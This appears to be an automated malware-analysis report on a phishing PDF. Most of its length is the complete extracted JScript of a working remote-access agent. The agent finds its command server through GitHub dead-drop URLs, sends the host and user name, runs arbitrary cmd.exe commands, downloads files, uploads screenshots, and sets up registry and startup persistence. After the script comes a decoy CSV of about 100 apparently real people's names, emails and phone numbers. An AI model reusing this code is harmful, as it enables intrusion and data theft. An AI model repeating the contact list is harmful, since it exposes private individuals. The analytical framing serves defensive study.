Malware Insights
The PDF contains embedded JavaScript that is heavily obfuscated and uses techniques like String.fromCharCode and XOR evaluation. The script attempts to download and execute a second-stage payload from provided URLs, indicating an Ingress Tool Transfer (T1105) attack pattern. It also utilizes ActiveXObject and WScript.Shell, common for Windows scripting execution (T1059.007). The presence of obfuscation (T1027) and the nature of the payload suggest a malicious intent, likely for credential exfiltration or further system compromise. Given it's a PDF, Spearphishing Attachment (T1566.001) is the likely initial access vector.
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics 8
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
//p0b2x6 return String.fromCharCode.apply\(String, bytes\); //p0b2x6 } //p0b2x6 -
PDF JavaScript WScript downloader high PDF_JS_WSCRIPT_DOWNLOADERDecoded PDF JavaScript reconstructs a Windows Script Host COM downloader using WScript.CreateObject plus XMLHTTP/ADODB.Stream style download, write, and run behavior. This is commodity payload delivery rather than a specific PDF parser CVE trigger.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript contains an unrendered phishing-kit placeholder low PDF_JS_TEMPLATE_PLACEHOLDEREmbedded JavaScript still contains an unrendered template / mail-merge placeholder (e.g. {SYSLINK}, {{recipient}}, '[[-Email-]]'). A delivered document has these substituted; an unrendered token means the file IS the phishing-kit template whose per-recipient URL / personalisation never ran. Complements PDF_URL_MAILMERGE_PLACEHOLDER, which only inspects annotation URIs.Matched line in script
} else { //p0b2x6 id = get_page_content_with_ie(server + "/getid", "action=getSerial&computer_name="+WshShell.ExpandEnvironmentStrings("%computername%")+"&username="+WshShell.ExpandEnvironmentStrings("%username%")+"&version="+version+"&cli="+ref); //p0b2x6 if(id.length == 16) { //p0b2x6 -
Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGERPDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://raw.githubusercontent.com/deadpooool/news/master/README.md Referenced by PDF JavaScript
- https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.mdReferenced by PDF JavaScript
- https://raw.githubusercontent.com/deadpooool/news/master/README.md','https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.mdReferenced by PDF JavaScript
- https://raw.githubusercReferenced by PDF JavaScript
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0003_000.js |
pdf-javascript-stream | PDF /JS object 3 at offset 0x75 | 31108 bytes |
SHA-256: 6e6b3311264114f36c921a151c1cbba6171f6c0532e3de9aefed8b7997fb7ae8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 11 shell/COM execution token(s). Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
try {
//p0b2x6
var WshShell = new ActiveXObject("WScript.Shell"); //p0b2x6
var fso = new ActiveXObject("Scripting.FileSystemObject"); //p0b2x6
var shellApp = new ActiveXObject("shell.application"); //p0b2x6
//p0b2x6
version = "1.3" //p0b2x6
ref = "bd" //p0b2x6
//p0b2x6
items = ['https://raw.githubusercontent.com/deadpooool/news/master/README.md','https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.md']; //p0b2x6
StorageDir = WshShell.ExpandEnvironmentStrings("%localappdata%")+"\\Microsoft\\PackageCache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"; //p0b2x6
extracted_file = "200_Germany.csv "; //p0b2x6
extracted_file_filesize = 12692 ; //p0b2x6
lnk_filesize = 21890 ; //p0b2x6
startup_shortcut = StorageDir + "\\services.lnk"; //p0b2x6
agent_location = StorageDir + "\\file.js"; //p0b2x6
agent_hidden_executer = StorageDir + "\\startup.js"; //p0b2x6
g3r = StorageDir + "\\g3r.reg"; //p0b2x6
agent_id_location = StorageDir + "\\id"; //p0b2x6
lckFile = StorageDir+"\\h.lck"; //p0b2x6
ieFile = StorageDir + "\\kill.js"; //p0b2x6
av = return_av_name(); //p0b2x6
pFolder = WshShell.ExpandEnvironmentStrings("%localappdata%")+"\\Python"; //p0b2x6
sctFile = pFolder+ "\\SC7.P7D"; //p0b2x6
pyFile = "main.py"; //p0b2x6
pyAlreadyRunning = 0; //p0b2x6
//p0b2x6
if(av.length != av.replace("Kasper", "").length) //p0b2x6
{ //p0b2x6
kasper = 1; //p0b2x6
} //p0b2x6
else //p0b2x6
{ //p0b2x6
kasper = 0; //p0b2x6
} //p0b2x6
kasperWritten = 0; //p0b2x6
main(); //p0b2x6
//p0b2x6
function main() { //p0b2x6
if(WScript.ScriptFullName != agent_location) { //p0b2x6
extract_and_run_decoy(); //p0b2x6
create_storage_dir(); //p0b2x6
create_ie_file(); //p0b2x6
create_startup_executer(); //p0b2x6
copy_agent_to_new_location(); //p0b2x6
exec_cscript(agent_location); //p0b2x6
delete_temp_files(); //p0b2x6
} else { //p0b2x6
lck = fso.CreateTextFile(lckFile, 1); //p0b2x6
exec_cscript(ieFile); //p0b2x6
main_loop(); //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function main_loop() { //p0b2x6
var now = get_time(); //p0b2x6
r3g(); //p0b2x6
if(kasper == 1 && fso.FileExists(agent_id_location) == false && kasperWritten == 0) //p0b2x6
{ //p0b2x6
WshShell.Run("reg import "+g3r, 0, 1); //p0b2x6
create_shortcut_in_startup(); //p0b2x6
kasperWritten = 1; //p0b2x6
} //p0b2x6
else //p0b2x6
{ //p0b2x6
WshShell.Run("reg import "+g3r, 0, 1); //p0b2x6
create_shortcut_in_startup(); //p0b2x6
//p0b2x6
} //p0b2x6
//p0b2x6
server = extract_srvaddr(); //p0b2x6
try { //p0b2x6
id = get_id(); //p0b2x6
while(1) { //p0b2x6
//p0b2x6
var passedsec = get_time()-now; //p0b2x6
if(passedsec > 60*60){ //p0b2x6
now = get_time(); //p0b2x6
server = extract_srvaddr(); //p0b2x6
} //p0b2x6
//p0b2x6
command = get_page_content_with_ie(server + "/getcommand", "action=getCommand&uid="+id); //p0b2x6
eval("obj=" +command); //p0b2x6
if(obj.command.length > 0) { //p0b2x6
if(obj.command.search('download') >= 0) { //p0b2x6
var spl = obj.command.split('|'); //p0b2x6
file = get_page_content_with_ie(server + "/dwnld?u="+spl[1], ""); //p0b2x6
if(file.length > 0) { //p0b2x6
bin_write(spl[2], hex2bin(file)); //p0b2x6
} //p0b2x6
} else { //p0b2x6
WshShell.Run("cmd.exe /c " +obj.command, 0, 0); //p0b2x6
} //p0b2x6
WScript.Sleep(10000); //p0b2x6
} else { //p0b2x6
WScript.Sleep(30000); //p0b2x6
} //p0b2x6
//p0b2x6
if(fso.FileExists(pFolder+"\\"+pyFile) && pyAlreadyRunning == 0) { //p0b2x6
oldWd = WshShell.CurrentDirectory; //p0b2x6
WshShell.CurrentDirectory = pFolder; //p0b2x6
//p0b2x6
pyAlreadyRunning = 1; //p0b2x6
WshShell.Run("python.exe "+pyFile, 0, 0); //p0b2x6
//p0b2x6
WshShell.CurrentDirectory = oldWd; //p0b2x6
} //p0b2x6
//p0b2x6
if(fso.FileExists(sctFile)) { //p0b2x6
sctb64 = base64_encode(sctFile); //p0b2x6
screen = get_page_content_with_ie(server + "/zaqxswcde123456789", "action=sendScreenshot&uid="+id+"&data="+sctb64); //p0b2x6
fso.DeleteFile(sctFile, 1); //p0b2x6
} //p0b2x6
//p0b2x6
} //p0b2x6
} catch (e) { //p0b2x6
WScript.Sleep(60000); //p0b2x6
main_loop(); //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function get_id() { //p0b2x6
id = ""; //p0b2x6
while(id.length != 16) { //p0b2x6
if(fso.FileExists(agent_id_location)) { //p0b2x6
f = fso.OpenTextFile(agent_id_location, 1); //p0b2x6
while (!f.AtEndOfStream) { //p0b2x6
id += f.ReadLine(); //p0b2x6
} //p0b2x6
f.Close(); //p0b2x6
up = get_page_content_with_ie(server + "/getid", "action=up&uid="+id+"&antivirus="+return_av_name()); //p0b2x6
} else { //p0b2x6
id = get_page_content_with_ie(server + "/getid", "action=getSerial&computer_name="+WshShell.ExpandEnvironmentStrings("%computername%")+"&username="+WshShell.ExpandEnvironmentStrings("%username%")+"&version="+version+"&cli="+ref); //p0b2x6
if(id.length == 16) { //p0b2x6
var s = fso.CreateTextFile(agent_id_location, true); //p0b2x6
s.Write(id); //p0b2x6
s.Close(); //p0b2x6
up = get_page_content_with_ie(server + "/getid", "action=up&uid="+id+"&antivirus="+return_av_name()); //p0b2x6
} //p0b2x6
} //p0b2x6
WScript.Sleep(30000); //p0b2x6
} //p0b2x6
return id; //p0b2x6
} //p0b2x6
//p0b2x6
function get_page_content_with_ie(url, postdata) { //p0b2x6
try{ //p0b2x6
var ie = new ActiveXObject("InternetExplorer.Application"); //p0b2x6
ie.Visible = 0; //p0b2x6
if(postdata.length == 0) { //p0b2x6
ie.Navigate(url); //p0b2x6
} else { //p0b2x6
ie.Navigate(url, "", "", stream_string_to_binary(postdata), "Content-Type: application/x-www-form-urlencoded"); //p0b2x6
} //p0b2x6
i = 0; //p0b2x6
while(i < 60) { //p0b2x6
if(ie.ReadyState == 4) { //p0b2x6
i = 60; //p0b2x6
} //p0b2x6
WScript.Sleep(1000); //p0b2x6
i = i + 1; //p0b2x6
} //p0b2x6
content = ie.document.body.innerHTML; //p0b2x6
content = content.replace("&", "&"); //p0b2x6
content = content.replace(">", ">"); //p0b2x6
content = content.replace("<", "<"); //p0b2x6
content = content.replace('"', '"'); //p0b2x6
content = content.replace("<pre>", ""); //p0b2x6
content = content.replace("</pre>", ""); //p0b2x6
content = content.replace("<PRE>", ""); //p0b2x6
content = content.replace("</PRE>", ""); //p0b2x6
ie.Quit(); //p0b2x6
delete ie; //p0b2x6
return content; //p0b2x6
} catch (e) { //p0b2x6
return ''; //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function stream_string_to_binary(str) { //p0b2x6
var BinaryStream = WScript.CreateObject('ADODB.Stream'); //p0b2x6
BinaryStream.Type = 2; //p0b2x6
BinaryStream.CharSet = "us-ascii" //p0b2x6
//p0b2x6
BinaryStream.Open(); //p0b2x6
BinaryStream.WriteText(str); //p0b2x6
BinaryStream.Position = 0; //p0b2x6
BinaryStream.Type = 1; //p0b2x6
//p0b2x6
return BinaryStream.read(); //p0b2x6
} //p0b2x6
//p0b2x6
function num2dot(num) { //p0b2x6
var d = num%256; //p0b2x6
for (var i=3; i>0; i--) { //p0b2x6
num = Math.floor(num/256); //p0b2x6
d = num%256+'.'+d; //p0b2x6
} //p0b2x6
return d; //p0b2x6
} //p0b2x6
//p0b2x6
function get_time() { //p0b2x6
var date = new Date(); //p0b2x6
return date.getTime()/1000|0; //p0b2x6
} //p0b2x6
//p0b2x6
function extract_srvaddr() { //p0b2x6
serverFound = false; //p0b2x6
pattern = 'our news start at (.*) thank you'; //p0b2x6
while(serverFound == false) { //p0b2x6
var item = items[Math.floor(Math.random()*items.length)]; //p0b2x6
var html = get_page_content_with_ie(item,''); //p0b2x6
if(html != '') { //p0b2x6
var match = extract_string(pattern, html); //p0b2x6
if(match != null) { //p0b2x6
srv = num2dot(match[1]/666); //p0b2x6
srv = srv + "/Validate"; //p0b2x6
srv_stat = get_page_content_with_ie(srv+"/ValSrv", ''); //p0b2x6
validate_str = extract_string('youwillnotfindthisanywhare', srv_stat); //p0b2x6
if(validate_str == 'youwillnotfindthisanywhare') { //p0b2x6
serverFound = true; //p0b2x6
return srv; //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function extract_string(pattern, str) { //p0b2x6
if(pattern != '' && str != '') { //p0b2x6
try { //p0b2x6
re = new RegExp(pattern, 'i') //p0b2x6
match = str.match(re); //p0b2x6
return match; //p0b2x6
} catch (e) { //p0b2x6
return null; //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function r3g() { //p0b2x6
var s = fso.CreateTextFile(g3r, true); //p0b2x6
s.WriteLine('Windows Registry Editor Version 5.00'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]'); //p0b2x6
s.WriteLine('"run"="' +StorageDir.replace(/\\/g, "\\\\")+ '\\\\services.lnk"'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Control Panel\\Cursors]'); //p0b2x6
s.WriteLine('"AppStarting"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,00'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); //p0b2x6
s.WriteLine('"Check_Associations"="no"'); //p0b2x6
s.WriteLine('"NoProtectedModeBanner"=dword:00000001'); //p0b2x6
s.WriteLine('"IE10RunOncePerInstallCompleted"=dword:00000001'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Recovery]'); //p0b2x6
s.WriteLine('"AutoRecover"=dword:00000002'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PhishingFilter]'); //p0b2x6
s.WriteLine('"EnabledV9"=dword:00000001'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation]'); //p0b2x6
s.WriteLine('"MSCompatibilityMode"=dword:00000001'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]'); //p0b2x6
s.WriteLine('"EnableBalloonTips"=dword:00000000'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]'); //p0b2x6
s.WriteLine('"GlobalUserOffline"=dword:00000000'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]'); //p0b2x6
s.WriteLine('"2500"=dword:00000003'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.WriteLine('[HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner]'); //p0b2x6
s.WriteLine('"BrowserMonitoring"=-'); //p0b2x6
s.WriteLine('"(Mon)3001"=-'); //p0b2x6
s.WriteLine(''); //p0b2x6
s.Close(); //p0b2x6
} //p0b2x6
//p0b2x6
function return_av_name() { //p0b2x6
try { //p0b2x6
var oWMISrvc = GetObject("winmgmts:\\\\.\\root\\cimv2"); //p0b2x6
var colOperatingSystems = oWMISrvc.ExecQuery("SELECT * FROM Win32_OperatingSystem"); //p0b2x6
//p0b2x6
var objItem = new Enumerator(colOperatingSystems); //p0b2x6
for(;!objItem.atEnd();objItem.moveNext()) { //p0b2x6
var version = objItem.item().Version.substr(0,3); //p0b2x6
} //p0b2x6
objWMIService = ""; //p0b2x6
try { //p0b2x6
var objWMIService = GetObject("winmgmts:\\\\.\\root\\SecurityCenter"); //p0b2x6
//p0b2x6
} catch(e) {} //p0b2x6
try { //p0b2x6
var objWMIService = GetObject("winmgmts:\\\\.\\root\\SecurityCenter2"); //p0b2x6
} catch (e) {} //p0b2x6
if (typeof(objWMIService) == "string") //p0b2x6
{ //p0b2x6
return 'N/A'; //p0b2x6
} //p0b2x6
var colItems = objWMIService.ExecQuery("SELECT displayName FROM AntiVirusProduct", "WQL"); //p0b2x6
//p0b2x6
var enumItems = new Enumerator(colItems); //p0b2x6
name = ""; //p0b2x6
for (;!enumItems.atEnd();enumItems.moveNext()) { //p0b2x6
name = enumItems.item().displayName+" and "+name; //p0b2x6
} //p0b2x6
//p0b2x6
if(name != null && name != '') { //p0b2x6
return name; //p0b2x6
} else { //p0b2x6
return 'N/A'; //p0b2x6
} //p0b2x6
} catch (e) { //p0b2x6
return 'N/A'; //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function CreateFolderRecursive(FullPath) { //p0b2x6
var arr = [], dir = [], path = [] //p0b2x6
//p0b2x6
arr = FullPath.split("\\"); //p0b2x6
path = ""; //p0b2x6
for(index=0; index<arr.length; ++index) { //p0b2x6
if(path != "") //p0b2x6
path = path+"\\"; //p0b2x6
path = path+""+arr[index]; //p0b2x6
if(!fso.FolderExists(path)) { //p0b2x6
try { //p0b2x6
fso.CreateFolder(path); //p0b2x6
} catch (e) { //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function copy_agent_to_new_location() { //p0b2x6
fso.CopyFile(WScript.ScriptFullName, agent_location); //p0b2x6
} //p0b2x6
//p0b2x6
function create_startup_executer() { //p0b2x6
var s = fso.CreateTextFile(agent_hidden_executer, true); //p0b2x6
s.WriteLine('var WshShell = new ActiveXObject("WScript.Shell");'); //p0b2x6
s.WriteLine('WshShell.Run("C:\\\\Windows\\\\System32\\\\cscript.exe '+agent_location.replace(/\\/g, "\\\\")+'", 0, 0);'); //p0b2x6
s.Close(); //p0b2x6
} //p0b2x6
//p0b2x6
function create_shortcut_in_startup() { //p0b2x6
var oShellLink = WshShell.CreateShortcut(startup_shortcut); //p0b2x6
oShellLink.TargetPath = "%comspec%"; //p0b2x6
oShellLink.Arguments = "/c cscript "+agent_hidden_executer; //p0b2x6
oShellLink.WindowStyle = 7; //p0b2x6
oShellLink.WorkingDirectory = StorageDir; //p0b2x6
oShellLink.Save(); //p0b2x6
} //p0b2x6
//p0b2x6
//p0b2x6
function create_storage_dir() { //p0b2x6
if(!fso.FolderExists(StorageDir)) { //p0b2x6
CreateFolderRecursive(StorageDir); //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function create_ie_file() { //p0b2x6
if(!fso.FileExists(ieFile)) { //p0b2x6
var s = fso.CreateTextFile(ieFile, true); //p0b2x6
s.WriteLine(unescape("var%20oWMISrvc%20%3D%20GetObject%28%22winmgmts%3A%5C%5C%5C%5C.%5C%5Croot%5C%5Ccimv2%22%29%3Bwhile%281%29%7BWScript.Sleep%28180000%29%3B%20cProcNIE%28%29%3B%7Dfunction%20cProcNIE%28%29%20%7Btry%20%7Bvar%20colProcLst%20%3D%20oWMISrvc.ExecQuery%28%22SELECT%20*%20FROM%20Win32_Process%20WHERE%20CommandLine%20LIKE%20%27%25-Embedding%25%27%20AND%20Name%20%3D%20%27iexplore.exe%27%22%29%3Bvar%20objItem%20%3D%20new%20Enumerator%28colProcLst%29%3Bfor%28%3B%21objItem.atEnd%28%29%3BobjItem.moveNext%28%29%29%20%7Bvar%20p%20%3D%20objItem.item%28%29%3Bp.Terminate%28%29%3B%7D%7D%20catch%20%20%28e%29%20%7B%7D%7D")); //p0b2x6
s.Close(); //p0b2x6
} //p0b2x6
} //p0b2x6
//p0b2x6
function extract_file(src, dest, start, file_size) { //p0b2x6
var oFile = fso.GetFile(src); //p0b2x6
var oRead = oFile.OpenAsTextStream(); //p0b2x6
data = oRead.Read(oFile.Size); //p0b2x6
oRead.Close(); //p0b2x6
offset_data = data.substr(start+1, file_size); //p0b2x6
var wFile = fso.OpenTextFile(dest, 2, true); //p0b2x6
wFile.Write(offset_data); //p0b2x6
wFile.Close(); //p0b2x6
} //p0b2x6
//p0b2x6
function delete_temp_files() { //p0b2x6
fso.DeleteFile(WScript.arguments(0), 1); //p0b2x6
fso.DeleteFile(WScript.ScriptFullName, 1); //p0b2x6
} //p0b2x6
//p0b2x6
function extract_and_run_decoy() { //p0b2x6
extract_file(WScript.arguments(0), extracted_file, lnk_filesize, extracted_file_filesize); //p0b2x6
WshShell.Run("cmd.exe /c "+extracted_file, false, false); //p0b2x6
} //p0b2x6
//p0b2x6
function exec_cscript(path) { //p0b2x6
WshShell.Run("cscript.exe "+path, false, false); //p0b2x6
} //p0b2x6
//p0b2x6
function base64_encode(path) { //p0b2x6
var inputStream = new ActiveXObject('ADODB.Stream'); //p0b2x6
inputStream.Open(); //p0b2x6
inputStream.Type = 1; //p0b2x6
inputStream.LoadFromFile(path); //p0b2x6
var bytes = inputStream.Read(); //p0b2x6
var dom = new ActiveXObject('Microsoft.XMLDOM'); //p0b2x6
var elem = dom.createElement('tmp'); //p0b2x6
elem.dataType = 'bin.base64'; //p0b2x6
elem.nodeTypedValue = bytes; //p0b2x6
return elem.text.replace(/[^A-Z\d+=\/]/gi, ''); //p0b2x6
} //p0b2x6
//p0b2x6
function bin_write(path, bin_data) { //p0b2x6
var BinaryStream = WScript.CreateObject("ADODB.Stream"); //p0b2x6
BinaryStream.Type = 2; //p0b2x6
BinaryStream.Charset = "ISO-8859-1"; //p0b2x6
BinaryStream.Open(); //p0b2x6
BinaryStream.WriteText(bin_data); //p0b2x6
BinaryStream.SaveToFile(path, 2); //p0b2x6
BinaryStream.Close(); //p0b2x6
} //p0b2x6
//p0b2x6
function hex2bin(hex) { //p0b2x6
var bytes = [], str; //p0b2x6
//p0b2x6
for(var i=0; i< hex.length-1; i+=2) //p0b2x6
bytes.push(parseInt(hex.substr(i, 2), 16)); //p0b2x6
//p0b2x6
return String.fromCharCode.apply(String, bytes); //p0b2x6
} //p0b2x6
//p0b2x6
Marcel,Kressner,Marcelkressner@gmx.de,Germany,(490359) 650-8990
Peter,Klein,klein-peter@freenet.de,Germany,(49) 938-4367
Oleg,Semenov,oleg.semenov@gmx.de,Germany,(1763) 867-4881
Sigmar,Meister,sigmarmeister@gmx.de,Germany,(4901511) 731-7333
Hans,Baumgarten,supertrader@hushmail.com,Germany,(494) 061-7345
Simon,Blessing,simonblessing1@web.de,Germany,(49171) 755-8414
Bernd,Schaefer Sell,berndaushamburg@gmx.de,Germany,(49403) 093-1971
Thilo,Bode,tebe74@googlemail.com,Germany,(49173) 384-4308
Sergej,Stenkin,sergejstenkin@freemail.ru,Germany,(4905641) 748-3361
Valerij,Spickov,walspick@unitybox.de,Germany,(49316) 660-4966
Mike,Grohmann,platafinanz@yahoo.de,Germany,(49305) 163-9935
Rainer,Ludwig,rainerludwig@gmx.net,Germany,(49171) 336-8353
Ulrich,Sperlich,ulrich.sperlich@gmx.de,Germany,(4901535) 380-9513
Steven,Goet,s.goet@web.de,Germany,(4904103) 317-3066
Kumar,Raja,romaraja@hotmail.com,Germany,(160) 733-6190
Hans,Schuldt,HansSchuldt@freenet.de,Germany,(491513) 805-8473
Alexei,Frank,novum_futurum@web.de,Germany,(491573) 816-3543
Meike + Bjoern,Neubauer,meike.bjoern.neubauer@t-online.de,Germany,(49573) 570-9830
Max,Dieringer,max.amir@me.com,Germany,(497115) 764-1334
Tanja,Lau,Lau.Tanja@gmx.de,Germany,(491577) 890-6843
Kevin,Leineweber,KevinLeineweber@gmx.de,Germany,(490049178) 408-6330
Alexander,Kaiser,bigalex77@hotmail.com,Germany,(491766) 103-5114
Christopher,Beyer,C.beyer1@gmx.net,Germany,(490177) 680-5651
Hendrik,Ehlert,hendrik@mehlert-online.de,Germany,(490338) 380-5030
Christian,Bader,badx@gmx.net,Germany,(1533) 757-4469
Stanislaw,Garbacz,stani456@googlemail.com,Germany,(4915771577) 304-7300
Bjoern,Hillers,hilli1970@googlemail.com,Germany,(491764) 134-9816
Curt,Nelsson,curtn@web.de,Germany,(4901578) 849-1843
Sonja & Carsten,Koepke,carstenkoepke3003@yahoo.de,Germany,(4991555985) 361-5800
Valentin,Kolaberdin,valentin@kolaberdin.com,Germany,(491577) 534-0734
Hinrich,Hoernlein Rummel,hhr@prophymed.com,Germany,(490171) 543-7439
Robin,Kosalla,RobinKosalla@googlemail.com,Germany,(49173) 965-3944
Tobias,Feigel,tobias.feigel@web.de,Germany,(49177) 735-1553
Christian-Johannes,Henrich,henrich.business@gmail.com,Germany,(490049163) 394-5150
Juergen,Robert,vk.lauterbach@yahoo.de,Germany,(49163) 343-9665
Augustin,Yimbi,ayimbi@gmx.de,Germany,(493331) 635-4543
Tanja,Mayfurth,tanjamayfurth@hotmail.com,Germany,(49163) 494-3103
Rolf Juergen,Vosseler,rolf.vosseler@t-online.de,Germany,(49485) 383-9404
Harald,Henrich,haraldhenrich0@gmail.com,Germany,(49633) 595-9700
Andreas,Schmitt,andreas_schmitt@live.com,Germany,(49891) 895-9659
Marcel,Schaefer,mas.main@googlemail.com,Germany,(491) 737-4466
Markus,Rechlin,markusrechlin@gmail.com,Germany,(49506703314) 334-8000
Ray (Rainer),Schrader,tipo48@googlemail.com,Germany,(4906753) 131-3609
Nikolaos,Kiparissis,nikos_ctp@hotmail.com,Germany,(1609) 443-3901
Marco,Wirges,marco.wirges@me.com,Germany,(49685) 396-0370
Sabine,Reineke herbst,zockerei@safux.de,Germany,(491768) 113-9113
Karl,Raase,inter-nett@gmx.de,Germany,(49537730334) 844-5000
Bjoern,Ohle,ohleb@yahoo.de,Germany,(49511) 303-3013
Patrick,Gutzmann,ilmyl@me.com,Germany,(491511) 653-9867
AHMET,BATAN,arcob38@windowslive.com,Germany,(490533) 513-1370
Xep,Vu Thi,xep47de@yahoo.de,Germany,(4901530) 777-4759
Hendrik,Schulze,stucan@gmx.de,Germany,(4901577) 170-7184
Gregor,Przeworski,gregor.przeworski@targobank.de,Germany,(491765) 510-6889
Katja,Hebestreit,katjahebestreit@yahoo.de,Germany,(491763) 678-4463
Alex,Huebgen,alexhue.trade@gmail.com,Germany,(496831) 307-1114
Alexander,Alert,alert76@googlemail.com,Germany,(493333) 600-9404
Juergen,Luebke,trader3108@freenet.de,Germany,(495319) 497-7376
Kim,Schwarzkopf,schwarzkopf.k@gmx.net,Germany,(496033) 987-1143
Jeana,Hauswald,jeana_haus@hotmail.de,Germany,(493117) 311-7936
Fabio,Frentzen,Fabio.Frentzen@web.de,Germany,(491578) 656-3768
Alexander,Eichler,airalex@hotmail.de,Germany,(491763) 066-3609
Ewald,Riedel,3683969@online.de,Germany,(490747) 591-4669
Stephan,Schwenke beust,sschwenke@gmx.de,Germany,(494151) 879-4714
Werner,Lenz,1aprovit@live.de,Germany,(491530) 639-9553
Wolfgang,Buschek,wolfib@gmx.de,Germany,(490911) 801-9003
Lukas,Schreiber,kontakt@trade-the-forex.de,Germany,(49173) 767-9418
Marc,Dornieden,Marc.Dornieden@googlemail.com,Germany,(49531) 317-0565
Andreas,Treptow,forex@andreas-treptow.de,Germany,(49630) 179-8670
Birgit,Finke,finke-birgit@t-online.de,Germany,(49175) 376-7351
Manfred,Paulun,manfred@paulunyland.de,Germany,(49453) 638-1671
Lars,Macario,lars.macario@gmail.com,Germany,(49171) 637-6999
Fawad,Amin,fawadamin3011@yahoo.de,Germany,(49309) 148-7670
Piyaphong,Saikamthon,onnoskish@hotmail.com,Germany,(49309) 981-3519
Jessica,Friesen,friesenjessica@gmx.de,Germany,(49178) 143-3506
Max,Lesemann,m.lesemann@posteo.de,Germany,(49173) 300-0000
Heiko,Klabes,heikoklabes@yahoo.de,Germany,(49349) 655-5001
Armin,Staender,arminstaender@gmx.de,Germany,(49173) 613-9606
Michael,Dinse,michaeldinse@gmx.de,Germany,(49173) 349-3743
Alexander,Degenstein,a.degenstein@gmx.de,Germany,(49171) 700-0000
Heiko,Lasch,heikosnews@gmx.de,Germany,(49305) 106-6030
Andreas,Hein,byteorder@me.com,Germany,(49656) 194-1084
Gerhard,Lungershausen,ompoa1@yahoo.de,Germany,(49360) 383-0550
Robert,Kluge,hopper_1@web.de,Germany,(49173) 341-1671
Francoise,Lhote,flhote@gmx.de,Germany,(49691) 751-3975
Karsten,Klimek,denham@gmx.de,Germany,(49691) 534-9778
Nikolas,Drangenstein,drangenstein@googlemail.com,Germany,(4906) 963-6631
Wolfgang,Zipp,wolfgang.zipp@t-online.de,Germany,(4963) 537-3633
Dumitru,Liviu,liviu-dumitru@t-online.de,Germany,(4913) 435-6678
Roy,Almagor,royalg006@mailinator.com,Germany,(4933) 433-4334
Friedrich,Becker,becker-ense@unitybox.de,Germany,(4903) 938-1335
Stefan,Mauss,mauss@t-online.de,Germany,(4951) 131-3407
Florian,Fornoff,daytradecentral@gmail.com,Germany,(4916) 133-1546
Julian,Strobl,julian.strobl@gmx.de,Germany,(491511) 530-9199
Sascha,Berg,sascha-berg@gmx.de,Germany,(49171) 796-3838
Hani,Basta,hany.p@gmx.de,Germany,(4901578) 764-8680
Klaus,Scharf,k.scharf@ksmd.de,Germany,(49391) 633-9143
Georg,Klotzsche,klotzschi@googlemail.com,Germany,(49353485) 697-4659
